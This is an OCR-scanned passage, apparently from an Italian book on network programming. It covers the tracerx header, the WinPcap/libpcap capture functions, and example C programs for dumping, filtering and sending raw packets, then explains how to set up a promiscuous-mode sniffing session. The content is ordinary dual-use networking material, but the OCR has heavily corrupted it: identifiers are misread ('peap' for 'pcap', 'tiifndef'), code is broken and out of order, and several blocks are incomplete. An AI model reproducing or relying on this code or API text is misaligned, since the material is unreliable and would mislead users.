* $Id: tx_struct.h,v 1.2 1999/06/03 22:06:52 route Exp $ 
* 

* Tracerx 

* tracerx structure prototypes 
* 

* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus . com> 

* Jeremy F. Rauch <jrauch@cadre . org> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary form must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution. 
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* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS * "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT , INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. 
* 

*/ 

tiifndef _TX_STRUCT_H 
tidefine _TX_STRUCT_H 

^include <unistd. h> 
iinclude <pcap . h> 
^include <llbnet . h> 

/* 

* Tracerx control structure. 
*/ 

struct tx_control 



u_char tx_flags; 


/* 


internai flags */ 


u_char *devlce; 


/* 


device to use */ 


u_char *tx_packet; 


/* 


pointer to the packet */ 


u_short ip_tos; 


/* 


IP type of servi ce */ 


u_short ±p_df; 


/* 


IP dont fragment */ 


u_short burst_rate; 


/* 


burst rate */ 


u_short current_ttl; 


/* 


current IP TTL */ 


u_short max_ttl; 


/* 


max IP TTL */ 


u_short initial_sport; 


/* 


initial source port */ 


u_short initial_dport; 


/* 


initial destination port */ 


u_short Id; 


/* 


tracerx packet ID */ 


u_short use_name; 


/* 


use domain names or dotted decimai s 


u_short packet_slze ; 


/* 


total packet size */ 


int packet_offset; 


/* 


IP packet offset */ 


Int protocol; 


/* 


transport protocol in use */ 


Int probe_cnt; 


/* 


number of probes to send per round */ 


int verbose; 


/* 


verbose mode */ 


int readlng_walt ; 


/* 


network reading wait */ 


int wrltlng__pause; 


/* 


network writing pause */ 


u_long host; 


/* 


destination host */ 


u_long packets_sent ; 


/* 


packets sent */ 


u_long packets_reply ; 


/* 


packets we got replies back */ 


struct sockaddr_ln sin; 


/* 


socket address structure */ 


struct libnet_link_int *1; 


/* 


libnet packet injection structure */ 


pcap_t *p; 


/* 


pcap packet listening structure */ 



/* 

* Packet payload. 
*/ 

struct tx jpayload 
{ 

u_char seq; 
u_char ttl; 
struct timeval 



tv; 



/* packet sequence number */ 
/* TTL packet injected with */ 
/* time vector */ 
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#def±ne TX_P slzeof (struct tx__payload) 
#endlf /* _TX_STRUCT_H */ 
/* EOF */ 



W incap 

Alcune funzionalità, come quelle che abbiamo visto nei capitoli relativi ai protocolli, si 
supportano sulle librerie SOCKET. 

Queste si agganciano a livelli più elevati di quelli a cui dovremmo agganciarci se dovessimo 
creare software con funzionalità di analisi dei pacchetti a più basso livello. 
Volendo interagire con questi dovremmo usare un livello molto basso, praticamente collegato 
a livello di interfaccia di rete. 

L'accesso ai device driver avviene tramite apposite funzioni fornite da microsoft per tali 
funzioni come ad esempio : 

BOOL DevlceloControl (HANDLE hDevlce , DWORD dwIoCon trolCode , LPVOID 
lpInBuffer , DWORD nlnBufferSlze , LPVOID IpOutBuffer , DWORD nOutBufferSize , 
LPDWORD lpBytesReturned , LPOVERLAPPED IpOverlapped ) ; 

WinPcap è un architettura per il capture dei pacchetti e per l'analisi delle reti su piattaforme 
Win32. 

Il sistema include un filtro di pacchetti a livello di Kernel, una libreria a basso livello fornita 
come DLL (packet.dll) e una libreria ad alto livello indipendente dal sistema (wpcap.dll). 
Il filtro dei pacchetti è in pratica un device driver che aggiunge a Windows la capacità di di 
catturare ed inviare dati in modo raw da e per una scheda di rete con la possibilità di salvare 
dentro ad un buffer i pacchetti catturati. 

Packet.dll è una libreria API che può essere utilizzata per accedere direttamente alle funzioni 
del driver dei pacchetti offrendo al programma un interfaccia indipendente da sistema 
operativo Microsoft. 

Wpcap.dll esporta un set di primitive per il capture che è compatibile con libpcap, la famosa 
libreria per il capture di Unix. 

Queste funzioni permettono di catturare pacchetti in modo indipendente dall'hardware usato e 
dal sistema operativo. 

Se state scrivendo un applicazione di capture senza avere una necessità di avere un 
aggancio a bassissimo livello è consigliato utilizzare la libreria wpcap.dll la quale di fatto è un 
superset della libreria per il capture libcap. 

Wpcap.dll utilizza le funzioni di PACKET.DLL ma fornisce un ambiente di sviluppo molto più 
potente. 

Con wpcap.dll operazioni come ad esempio il capture dei pacchetti, la c4reazione di filtri per 
questa funzione oppure il sistema per il salvataggio sono implementate in modo sicuro e 
intuitivo. 

Libcap è capace di fornire tutte le funzioni necessarie per un monitor di rete standard o per 
uno sniffer. 

Oltre a questo i programmi scritti per usare libpcap sono facilmente compilabili anche in Unix. 
In ogni modo le API di PACKET.DLL offrono alcune possibilità che non sono fornite da 
libpcap. 

Libpcap è stata scritta per essere portatile e per offrire un sistemaq per il capture 

indipendente dal sistema operativo. 

Le funzioni presenti dentro a PACKET.DLL sono : 



• PacketGetAdapterNamss 

• PacketOpenAdapter 

• PacketClossAdapter 

• PacketAllocatePacket 

• PacketlnitPacket 

• PacketFreePacket 
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• PacketRecslvePacket 

• PacketSetMlnToCopy 

• PacketSendPacket 

• PacketRes&tAdapter 

• PacketSetHwFilter 

• PacketRequsst 

• PacketSetBuff 

• PacketSetBpf 

• PacketGetStats 

• PacketGetWetrype 

• PacAetSetJ?eadrimeout 

• PacketSetMode 

• PacketSstNumWritss 

• PacketGetNetlnfo 

Dopo aver visto nei suoi capitoli TCPDUMP è obbligatorio vedere la versione per Windows 
fatta da una nota Università italiana. 

Il pacchetto viene distribuito con tanto di sorgenti necessari alla creazione di una serie di 

librerie utilizzabili all'interno dei propri programmi. 

Windump rispetto TCPDUMP dispone di qualche opzione aggiuntiva. 

Il pacchetto Wincap invece è una libreria il cui scopo è quello di catturare i pacchetti TCP. 

Per poter utilizzare la libreria è necessario includere all'interno dei propri applicativi il file di 

header : 

#include <pcap.h> 

Le funzioni disponibili dentro alla libreria WPCAP.LIB, la quale deve essere linkata al 
programma, sono : 

pcap_t *pcap_open_live (char *device, int snaplen, int promise, int to_ms, char *ebuf) 
pcap_t *pcap open off line (char *fname, char *ebuf) 
pcap_dumper_t *pcap dump open (pcap_t *p, char *fname) 
char errbuf [PCAP_ERRBUF_SIZE ] ; 
char *pcap lookupdev (char *errbuf) 

int pcaplookupnet (char *device, bpf_u__int32 *netp, bpf_u_int32 *maskp, char *errbuf) 

int pcap_dispatch (pcap_t *p, int cnt, pcap_handler callback, u_char *user) 

int pcap_loop (peap t *p, int cnt, pcap handler callback, u_char *user) 

void pcap__dump (u__char *user, struct pcap_pkthdr *h, u_char *sp) 

int pcap^compile (pcap_t *p, struct bpf_j>rogram *fp, char *str, int optimize, 

bpf_u_int32 netmask) 

int peap set filter (pcap__t *p, struct bpf__program *fp) 

u char *pcap__next (pcap_t *p, struct pcap^pkthdr *h) 

int peap datalink (pcap_t *p) 

int peap^snapshot (pcap_t *p) 

int pcap__is_swapped (pcap__t *p) 

int pcap major^version (pcap_t *p) 

int pcap_minor_version (pcap__t *p) 

int pcap__stats (peap t *p, struct peap stat *ps) 

FILE *pcap_file (pcap_t *p) 

int pcap__fileno (pcap_t *p) 

void peap perror (pcap_t *p, char *prefix) 

char *pcap_geterr (pcap__t *p) 

char *pcap__strerror (int error) 

void pcap close (pcap_t *p) 

void pcap^dump close (pcap__dumper_t *p) 

WIN32 SPECIFIC FUNCTIONS 

int peap setbuff (pcap_t *p, int dim) 

int peap setmode (pcap_t *p, int mode) 

int pcap__setmintocopy (pcap__t *p, int size) 

HANDLE pcap__getevent (pcap__t *p) 

int pcap_sendpacket (pcap_t *p, u_char *buf, int size) 



Descrizione 
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La Packet Capture library fornisce un interfaccia ad alto livello per eseguire il capture di 
pacchetti. 

Tutti i pacchetti sulla rete, anche quelli destinati ad altri hosts, sono accessibili tramite questo 
meccanismo. 

Le funzioni 

pcap_open_live() è utilizzata per ottenere il descrittore dei pacchetti.. device è una stringa 
che specifica il device di rete da aprire, snaplen specifica invece la massima lunghezza in 
bytes del capture. promise specifica l'interfaccia che deve essere messa in modalità 
promiscua. to_ms è il timeout in millisecondi, ebufè utilizzato per restituire un errore e viene 
settato solo se la funzione fallisce. In questo caso restituisce un NULL. 

pcap_open_offline() è chiamata per aprire un 'savefile' in lettura, fname specifica il nome 
del file da aprire. Il file ha lo stesso formato di quelli usati da tcpdump(1) e tcpslice(1). Il 
nome "-" è il sinonimo di stdin. ebufè utilizzato per restituire un errore ovvero NULL. 

pcap_dump_open() è chiamata per aprire un "savefile" per la scrittura. Il nome "-" è 
sinonimo di stdout. NULL è restituito in caso d'errore, p è una struttura peap come restituita 
da pcap_open_offline() e pcap_open_live(). fname specifica il nome del fileche deve 
essere aperto. 

pcap_lookupdev() ritorna un puntatore al device della rete adatto per l'uso con 
pcap_open_live() e pcap_lookupnet(). In caso d'errore viene restituito NULL 

pcap_lookupnet() viene usata per determinare il numero di rete e la mask associata con il 
device di rete device. Ambedue netp e maskp sono puntatori bpf_u_int32. Una valore di -1 
restituito indica un errore. In questo caso viene riempita errbuf con una stringa d'errore. 

pcap_dispatch() è usata per raccogliere e processare I pacchetti., cnt specifica il numero 
massimo di pacchetti che devono essere processati. Un cnt settato a -1 processa tutti I 
pacchetti ricevuti in un buffer. Un valore cnt di 0 processa tutti I pacchetti fino a quando non 
capita un errore, fino a quando non viene ricevuto un EOF , oppure avviene un timeouts di 
lettura, callback specifica una routine che deve essere chiamata con tre argomenti: un 
puntatore u_char viene passato da pcap_dispatch(), un puntatore ad una struttura 
pcap_pkthdr struct, e un puntatore u_chara\ pacchetto di dati. Il numero di pacchetti restituito 
è quello di quelli letti. Zero è restituito se viene individuata un EOF -1 indica un errore e le 
funzioni pcap_perror() o pcap_geterr() possono essere usate per visualizzare il testo 
dell'errore stesso.. 

pcap_dump() fa uscire un pacchetto su "savefile" aperto con pcap_dump_open(). Notate 
che gli argomenti usati nella chiamata sono utilizzabili con pcap_dispatch(). 

pcap_compile() è usata per compilare la stringa str in un programma filtro, program è un 
puntatore a una struttura bpfjprogram la quale viene riempita da pcap_compile(). optimize 
controlla se viene eseguita un ottimizazione sul codice restituito, netmask specifica la 
netmask della rete locale. 

pcap_compile_nopcap() è simile a pcap_compile() eccetto per il fatto che al posto della 
struttura peap structure, vengono passati snaplen e linktype esplicitamente. È inteso che 
venga usata per compilare filtri per l'uso diretto bpf., senza aver chiamato pcap_open(). 

pcap_setfi lter() is used to specify a filter program, fp is a pointer to an array of bpf_program 
struct, usually the result of a cali to pcap_compile(). -1 is returned on failure; 0 is returned on 
success. 

pcap_loop() è simile a pcap_dispatch() eccetto per il fatto che la lettura avviene per un 
certo numero cnt di pacchetti. Questa funzione non ritorna quando una lettura va in timeout. 
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pcap_next() restituisce un puntatore u_chara\ prossimo pacchetto. 
pcap_datalink() ritorna il tipo di link, ad esempio DLT_EN10MB. 

pcap_snapshot() ritorna la lunghezza dello snapshot specificato quando viene chiamata 
pcap_open_live. 

pcap_is_swapped() restituisce vero se "savefile" utilizza un altro tipo di ordinamento rispetto 
il sistema corrente. 

pcap_major_version() rende la parte .maggiore del numero di versione. 
pcap_minor_version() rende la parte minore del numero di versione. 
pcap_file() restituisce il nome del file "savefile." 

int pcap_stats() rende 0 e riempie una struttura pcap_stat. Il valore rappresenta la statistica 
dei pacchetti ricevuti dall'inizio fino al momento dela chiamata. Se si verifica un errore viene 
restituito -1 e pcap_perror() o pcap_geterr() possono essere usate per stampare le 
stringhe d'errore. 

pcap_fileno() restituisce il numero del descrittore del file "savefile". 
pcap_perror() stampa il testo dell'ultimo errore capitato. 
pcap_geterr() restituisce il testo dell'errore library error. 
pcap_strerror() è fornito in caso che strerror(1) non sia disponibile. 
pcap_close() chiude il file associato ape disalloca le risorse. 
pcap_dump_close() chiude "savefile." 

pcap_setbuff() setta la dimensione del buffer circolare associato all'adattatore p a dim bytes. 
Restituisce 0 se la chiamata alla funzione è andata bene se no -1 . Se fosse già stato creato 
un vecchio bufferl con una chiamata precedente a pcap_setbuff(), questo verrebbe 
cancellato e I pacchetti contenuti verrebbero scaricati. Usando pcap_open_live() per aprire 
un adattatore, il buffer associato è 1 MB di default. 

pcap_setmode() setta il modo di lavorare dell'interfaccia nel modo specificato da p. I valori 
corretti per mode sono MODE CAPT (default capture mode) e MODE STAT (modo 
statistico). Se l'interfaccia è in modalità statistica, la funzione di callback settata da 
pcap_dispatch() o pcap_loop() viene invocata ogni to_ms millisecondi. Per ricevere dati 
contenenti due interi a 64 bit indicanti rispettivamente il numero di pacchetti e il totale dei 
bytes di memoria specificati per il filtro BPF. 

int pcap_setmintocopy(pcap_t *p, int size) cambia il parametro 'mintocopy' dell'interfaccia 
p, i.e. il totale minimo di dati che deve essere letto dal driver dei pacchetti in una singola 
chiamata. Se la dimensione è grande, il kernel è forzato ad attendere più pacchetti prima di 
restituire i dati all'utente. Questo garantisce un numero minore di chiamate alla funzione. 

HANDLE pcap_getevent(pcap_t *p) ritorna I' handle dell'evento associato con l'interfaccia 
p. Questo evento può essere passato a qualche funzione del tipo WaitForSingleObject o 
WaitForMultipleObjects per attendere che il buffer dei dati contenga dei dati senza seguire 
letture. 
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int pcap_sendpacket(pcap_t *p, u_char *buf, int size) questa semplice funzione permette 
di spedire pacchetti in modo raw sulla rete uasando wpcap al posto di accedere direttamente 
alle API., p è un interfaccia che può essere usata per spedire pacchetti., bui contiene il dati 
dei pacchetti da spedire, size è la dimensione di bui. 

Un esempio di PACKETDUMP eseguito con queste funzioni appena viste è il seguente : 

iinclude <stdlib.h> 
iinclude <std±o.h> 

iinclude <pcap . h> 

idefine MAX_PRINT 80 
idefine MAX_LINE 16 



void dispatcherhandler (uchar *, 

const struct pcap __pkthdr * , const u_char *) ; 
void usage(); 

void main (int argc, char **argv) { 
pcap^t *fp; 

char error[PCAP__ERRBUF_SIZE]; 

if (argc < 3) 
l 

printf ("\n\t pktdump [-n adapter] / [-f file_name] \n\n") ; 
return; 

} 

switch (argv[l] [1]) 
( 

case 'n ' : 
{ 

if ( (fp= pcap_open_live (argv [2] , 100, 1, 20, error) ) == NULL) 
{ 

f printf (stderr, "\nError opening adapter\n") ; 
return; 

} 

ì; 

break; 

case '£': 
{ 

if ( (fp = pcap_open_offline (argv [2] , NULL) ) == NULL) 
( 

f printf (stderr , "\nError opening dump file\n") ; 
return; 

} 

ì; 

break; 

} 

// read and dispatch packets until EOF is reached 
pcap_loop (fp, 0, dispatcher_handler, NULL); 

} 



void dispatcher handler (u char *templ, 

const struct pcap_pkthdr *header, const u_char *pkt_data) 

{ 

u_int i=0; 

//print pkt timestamp and pkt len 

printf ( "%ld: %ld (%ld)\n", header->ts . tv_sec, header->ts . tv_usec, header->len) ; 



while ( (i<MAX_PRINT) && (i<header->len) ) 
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i++; 

printf("%x ", pkt_data[i] ) ; 

if ( (i%MAX_LINE) == 0) printf ("\n") ; 

} 

printf ("\n\n") ; 

} 



void usage() 
{ 



printf ("\n\t pktdump [-n adapter] / [-f file_name]\n") ; 
exit (0) ; 




Il programma esegue inizialmente l'apertura dell'interfaccia con 



if ( (fp= pcap_open_live (argv[2] , 100, 1, 20, error) ) == NULL. 




Il processo dei pacchetti invece viene eseguita con 

pcap_loop(fp, 0, dispatcher_handler, NULL); 

La funzione 

void dispatcher_handler(u_char *temp1, const struct pcap_pkthdr *header, const u_char 
*pkt_data) 

viene passata come argomento alla funzione precedente la quale viene chiamata ogni 
qualvolta viene ricevuto un pacchetto. 

Il filtraggio dei pacchetti può essere eseguito mediante l'utilizzo dei filtri il quale devono 

essere utilizzati mediante le funzioni di compilazione. 

Un esempio di programma che utilizza tali filtri è il seguente. 

// pcap_filter.c 

iinclude <stdlib.h> 
iinclude <stdio.h> 

^include <pcap . h> 

idefine MAX_PRINT 80 
idefine MAX_LINE 16 



void dispatcher handlerfu char *, 

const struct pcap _pkthdr * , const u_char *) ; 
void usage(); 

void main (int argc, char **argv) { 
pcap_t *fp; 

char error [PCAP_ERRBUF_SIZE] ; 

char *device=NULL; 

char *ifilename=NULL; 

char *ofilename=NULL; 

char *filter=NULL; 

int i=0; 

pcap_dumper_t *dumpfile; 
struct bpf_program fcode; 
bpf_u_int32 SubNet,NetMask; 

if (argc == 1) 
{ 

usage(); 
return; 

} 
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switch (argv[i] [1]) 
l 

case ' i ' : 
{ 

}; 

break; 

case •£': 
{ 

ì; 

break; 

case 'o': 
{ 

ì; 

break; 

case 'p ' : 
{ 

ì; 

break; 



} 

} 

//open a capture from the network 
if (devi ce != NULL) { 

if C (fp= pcap_open_live (device, 1514, 1, 20, error) ) == NULL) 

{ 

fprintf (stderr, "\nUnable to open the adapter .\n" ) ; 
return; 

} 

} 

//open a capture from file 
else if (ifilename != NULL) { 

if ( (fp = pcap__open_off line (ifilename, NULL) ) == NULL) 

{ 

fprintf (stderr , "\nUnable to find input file.\n") ; 
return; 

} 

} 

else usage(); 

if(filter!=NULL) { 

//obtain the subnet 
if (device !=NULL) ( 

if (pcap_lookupnet (device, SSubNet, SNetMask, error) <0) { 

fprintf (stderr, "\nUnable to obtain the netmask.\n") ; 

return; 

} 

} 

else NetMask=Oxffffff; //If reading from file, we suppose to be in a C class 

network 

//compile the filter 

if (pcap_compile (fp, Sfcode, filter, 1, NetMask) <0 ) { 

fprintf (stderr , "\nError compiling filter: wrong syntax.\n") ; 
return; 

} 

//set the filter 

i f (pcap_set filter (fp, Sfcode) <0) { 

fprintf (stderr, "\nError setting the filter\n") ; 
return; 

} 




device=argv [i+1 ] ; 



ifilename=argv[i +1 ] ; 



ofilename=argv[i +1 ] ; 



filter=argv [i+1 ] ; 
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//open the dump file 
if (ofilename != NULL) { 

dumpfile=pcap_dump_open (fp, ofilename) ; 
if (dumpfile==NULL) { 

f printf (stderr, "\nError opening output file\n") ; 
return; 

} 

} 

else usage(); 
//start the capture 

pcap__loop (fp, 0, dispatcher_handler, (unsigned char *) dumpfile) ; 

} 

//Callback function called by libpcap for every incoming packet 
void dispatcherhandler(uchar *dumpfile, 

const struct pcap__pkthdr *header, const 

u_char *pkt_data) 

{ 

u_int i=0; 

//save the packet on the dump file 
pcap_dump (dump file , header , pkt__data) ; 

//the next instruction forces the captured packet to be written to disk. 
//Notice that flushing the file for every packet ensures the coherency between 
the network 

//and the dump file, but decreases the performance, 
fflush ( (FILE*) dumpfile) ; 

) 



void usage() 
{ 

printf ("\npf - generic packet filter . \nWritten by Loris Degioanni 
(loris@netgroup-serv.polito.it) . ") ; 

printf ("\nUsage:\npf [-i interface] / [-f input__file_name] -o output_file_name -p 
packet_filter\n \n ") ; 
exit (0) ; 



Un altro esempio scritto da Loris Degioanni utilizzato per inviare pacchetti è il seguente: 



/* This simple example shows how to send raw packets to the network using 
/* 

*/ 

the Packet Capture Driver 

Copyright (C) 1999 Politecnico di Torino 

This file is part of the Packet Capture Driver Developer's Pack. 

This library is free software; you can redistribute it and/or 
modify it under the terms of the GNU Lesser General Public 
License as published by the Free Software Foundation; either 
version 2 of the License, or (at your option) any later version. 

This library is distributed in the hope that it will be useful, 
but WITHOUT ANY WARRANTY; without even the implied warranty of 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE . See the GNU 
Lesser General Public License for more details. 

You should have received a copy of the GNU Lesser General Public 
License along with this library; if not, write to the Free Software 
Foundation, Inc., 59 Tempie Place, Suite 330, Boston, MA 02111-1307 USA 
*/ 

iinclude <windows.h> 
iinclude <stdio.h> 
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^include <time.h> 

^include " . . \ . . \Include\packet32 . h " 

#define SIMULTANEOU_READS 10 
#define MAX_ETHERNET_FRAME_SIZE 1514 

idefine Max_Num_Adapter 10 

// Prototypes 

void PrintPackets (LPPACKET IpPacket) ; 

char AdapterList [Max_Num_Adapter] [1024 ] ; 



int mainfint argc, char **argv) 
{ 

char packetbuff [5000] ; 

// define a pointer to a ADAPTER structure 
LPADAPTER IpAdapter = 0; 

// define a pointer to a PACKET structure 

LPPACKET IpPacket; 

int i , npacks , Snaplen ; 

DWORD dwErrorCode; 

DWORD dwVersion; 

DWORD dwWindowsMajorVersion; 

//unicode strings (winnt) 

WCHAR AdapterName [512] ; // string that contains a list of the network 

adapters 

WCHAR *temp, *templ; 

//ascii strings (win95) 

char AdapterNamea [512] ; // string that contains a list of the network 

adapters 

char *tempa, *templa; 

int AdapterNum=0 , Open; 

ULONG AdapterLength; 

float cpu_time; 

printf ("Traffic Generator v 0 . 9999\nCopyright 1999 Loris Degioanni 
( loris@netgroup-serv . polito . it) ") ; 

printf ( "\nSends a set of packets to the network."); 

if (argc == 1) { 

printf ("\n\n Usage: tg [-i adapter] -n npacks -s size") ; 
printf ("\n size is between 60 and 1514\n\n") ; 
return —1; 

} 



AdapterNamea [0]=0; 

//get the command line parameters 
for (i=l; i<argc; i+=2) ( 

switch (argv[i] [1]) 
{ 

case ' i ' : 

sscanf (argv[i+l ] , "%s ", AdapterNamea) ; 
break; 
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break; 

case 's': 

sscanf (argv[i+l ] , "%d", SSnaplen) ; 
break; 

} 

} 



in WinNT. 



if (AdapterNamea [0] ==0) { 

// obtain the name of the adapters installed on this machine 
AdapterLength=l 024; 

printf ( "Adapters installed: \n ") ; 
i=0; 

// the data returned by PacketGetAdapterNames is different in Win95 and 

// We have to check the os on which we are running 
dwVersion=GetVersion () ; 

dwWindowsMajorVersion = (DWORD) (LOBYTE (LOWORD (dwVersion) )) ; 
if (! (dwVersion >= 0x80000000 SS dwWindowsMajorVersion >= 4)) 
{ // Windows NT 

PacketGetAdapterNames (AdapterName , SAdapterLength) ; 
t emp=Adapt erName ; 
tempi =AdapterName ; 

while ((*temp!='\0') Il (* (temp-1) !='\0')) 
{ 

if (*temp=='\0') 
{ 

memcpy (AdapterList [i] , tempi, (temp-templ) *2) ; 
templ=temp+l ; 
i++; 

ì 

temp++; 

} 

Adapt erNum=i ; 

for (i=0; i<AdapterNum; i++) 

wprintf(L"\n%d- %s\n", i+1, AdapterList [i] ) ; 
printf ("\n ") ; 



} 

else / /Windows 95 
{ 

PacketGetAdapterNames (AdapterNamea , SAdapterLength) ; 
t empa =AdapterNamea ; 
t empi a =AdapterNamea ; 

while ((*tempa!='\0') Il (* (tempa-1) !='\0')) 
{ 

if (*tempa== ' \0 ' ) 
{ 

memcpy (AdapterList [i] , tempia, tempa-templa) , 

templa=tempa+l ; 

i++; 

) 

tempa++; 

} 

Adapt erNum=i ; 

for (i=0 ; i<AdapterNum; i++) 

printf ( " \n%d- %s\n",i+l, AdapterList [i]) ; 
printf ("\n") ; 



do 
{ 
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if (Open>AdapterNum) printf ("\nThe number must be smaller than 

%d", AdapterNum) ; 

} while (Open>AdapterNum) ; 






if ( ! lpAdapter / / ClpAdapter^>hFile == INVALID_HANDLE_ 


VALUE) ) 


{ 

dwErrorCode = GetLcLstError () } 

printf ( "Unable to open the driver, Error Code 

%lx\n ", dwErrorCode) ; 




return } 

ì 




} 

else{ 




lpAdapter = PacketOpenAdapter (AdapterNamea) ; 




if (HpAdapter // (lpAdapter->hFile == INVALID_HANDLE_ 


VALVE) ) 


{ 

dwErrorCode=GetLastError ( ) ; 

printf ( "Unable to open the driver, Error Code 

*1x\ti ", dwErrorCode) ; 




return (-1) ; 

} 




} 

// set the network adapter in promiscuous mode 
PacketSetHwFilter (lpAdapter, NDIS_PACKET_TYPE_PROMISCUOUS) ; 




if( (IpPacket = PacketAllocatePacket () ) ==NULL) { 

printf ("\nError: failed to allocate the LPPACKET structure . " ) ; 
return (-1) ; 

} 


packetbuff 10] =1; 
packetbuff [1]=1; 
packetbuff [2 ] =1 ; 
packetbuff [3 ] =1 ; 
packetbuff [4 ] =1 ; 
packetbuff [5 ] =1 ; 




packetbuff [6] =2; 
packetbuff [7] =2; 
packetbuff [8] =2; 
packetbuff [9] =2; 
packetbuff [1 0] =2; 
packetbuff [11] =2; 




for(i=12;i<1514;i++) { 

packetbuff [i] =i%256; 

} 




PacketlnitPacket (IpPacket, packetbuff, Snaplen) ; 
// capture the packet 




PacketSetNumWrites (lpAdapter, npacks) ; 




printf ( "\n\nGenerating %d packets npacks) ; 




cpu time = clock () ; 




PacketSendPacket (lpAdapter, IpPacket , TRUE) ; 




cpu_time = (clock () - cpu_time) /CLK_TCK; 




printf ( "\n\nElapsed time: %5 . 3f\n" , cpu_time) ; 
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printf ("\nTotal bytes generateci = %d", (Snaplen+24) *npacks) ; 
printf ("\nTotal bits generateci = %d", (Snaplen+24) *npacks*8) ; 

printf ("\nAverage packets per second = %d", (int) ( (doublé) npacks/cpu_time) ) ; 

printf ( "\nAverage bytes per second = %d", 
(int) ( (doublé) ( (Snaplen+24) *npacks) /cpu__time) ) ; 

printf ( "\nAverage bits per second = %d", 
(int) ( (doublé) ( (Snaplen+24) *npacks*8) /cpu_time) ) ; 

printf ("\n"); 

PacketFreePacket (IpPacket) ; 

// dose the adapter and exit 

PacketCloseAdapter (lpAdapter) ; 
return (0) ; 



Programmazione nei dettagli con PCAP 

Per poter scrivere dei programmi utilizzanti PCAP la prima cosa da comprendere è relativo al 
fatto di riuscire a comprendere bene come di fatto è strutturato un programma di questo tipo. 
Volendo fare un flusso di operazioni da eseguire avremmo: 

1. Indentificazione di quale interfaccia di rete si vuole sniffare. Sotto Unix i nomi sono 
del tipo ethO, ethl e cosi via ma potrebbe anche essere xl 1 ecc. 

2. Inizializzazione di PCAP durante la quale si specifica appunto quale interfaccia 
utilizzare. E' anche possibile lavorare su interfacce multiple. L'apertura avviene come 
nel caso dei files con i quali si esegue un apertura in lettura o scrittura avendo 
restituito un handles il quale verrà poi usato come riferimento. Dobbiamo dare un 
nome alla sessione di sniffing 

3. In quella serie di eventi nei quali vorremo sniffare un traffico specifico, dovremo 
creare le regole di filtraggio, compilarle e usarle. Queste costituiscono un processo a 
tre fasi. Il set di regole è mantenuto in una stringa e viene convertito in un formato 
che pcap può leggere. La compilazione viene eseguita soltanto chiamando una 
funzione all'interno del nostro programma; questa non pretende l'uso di una 
programma esterno. Dopo questo potremo applicare le regole in tutte le sessioni in 
cui sono necessarie. 

4. Finalmente possiamo chiedere a pcap di entrare nel suo loop di esecuzione primario. 
In questo stato pcap attende fino a quando ha ricevuto tanti pacchetti quanti vuole. 
Tutte le volte che riceve un nuovo pacchetto richiama una funzione che è stata già 
definita. Questa funzione può eseguire tutto quello che si vuole; ad esempio potrebbe 
suddividere il pacchetto e stamparlo all'utente, o potrebbe salvarlo dentro a un file. Al 
limite potrebbe anche non fare nulla. 

5. Dopo che la sessione di sniffing è considerata soddisfacente possiamo chiudere la 
sessione e terminare. 



Questo è un semplicissmo esempio di processo con cinque passi in totale, uno dei quali 
opzionale (il numero 3). 



Esistono due tecniche differenti finalizzate a settare un device. 
Il primo. 

^include <stdio .h> 

^include <pcap.h> 

int main(int argc, char *argv[]) 

{ 
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printf ( "Device : %s \n ", dev) ; 




L'utente specifica il device passando il suo nome come primo argomento del programma. 
A questo punto la stringa "dev" contiene l'interfaccia sulla quale si vuole eseguire lo sniffing 
nello tesso formato che pcap comprende. 

L'altra tecnica per la specifica dell'interfaccia è altrettanto semplice. 



^include <stdio.h> 
^include <pcap.h> 
int main () 
{ 

char *dev, errbuf [PCAP_ERRBUF_SIZE] ; 
dev = pcap_lookupdev (errbuf ) ; 
printf ( "Device : %s \n ", dev) ; 
return (0) ; 

ì 



In questo caso pcap setta il device in suo possesso. 

Molte delle funzioni pcap permettono di passargli degli argomenti specificati come stringa. 
Negli eventi che il comando genera qualche problam, questo riempie la variabile stringa con 
una descrizione dell'errore. 

In questo caso la funzione pcap_lookupdev() crea un errore per cui in errbuf esiste il 
messaggio salvato che in questo caso è appunto il nome dell'interfaccia. 

Apertura del device 

Il task relativo alla creazione di una sessione di sniffing è veramente semplice. 
Per fare questo usiamo la funzione pcap_open_live(). 
Il prototipo di questa funzione è il seguente : 

pcap_t *pcap_open_live(char *device, int snaplen, int promise, int to_ms, char *ebuf) 

Il primo argomento è il device che abiamo visto nella sezione precedente. 

snaplen è un intero che definisce la massima lunghezza in bytes che devono essere 

catturati. da pcap. 

promise, quando settato a true, porta l'interfaccia in modalità promiscua. 
to_ms è il timeout in lettura espresso in millisecondi. 

he read time out in millisecondi (0 significa che pcap deve sniffare fino a quando non si 
verifica un errore; -1 sniffa in modo indefinito) 

L'ultima, ebuf è una stringa nella quale è possibile salvare una stringa relativa ad un 

messaggio d'errore. 

La funzione restituisce un handle. 

A dimostrazione guardate il seguente codice: 

^include <pcap.h> 

pcap_t *handle; 



Filtering traffic 

Questo frammento di codice apre un device salvato in somedev dicendo di leggere BUFSIZE 
bytes . 

Oltre a questo le specifiche dicono di aprire in modo promiscuo l'interfaccia, che continui a 
sniffare sino a quando non capita un errore e se questo capita la stringa descrittiva deve 
essere inserita dentro a errbuf. 

È necessario fare una precisazione legata al modo promiscuo e a quello non promiscuo 
relazionata all'attività di sniffing. 
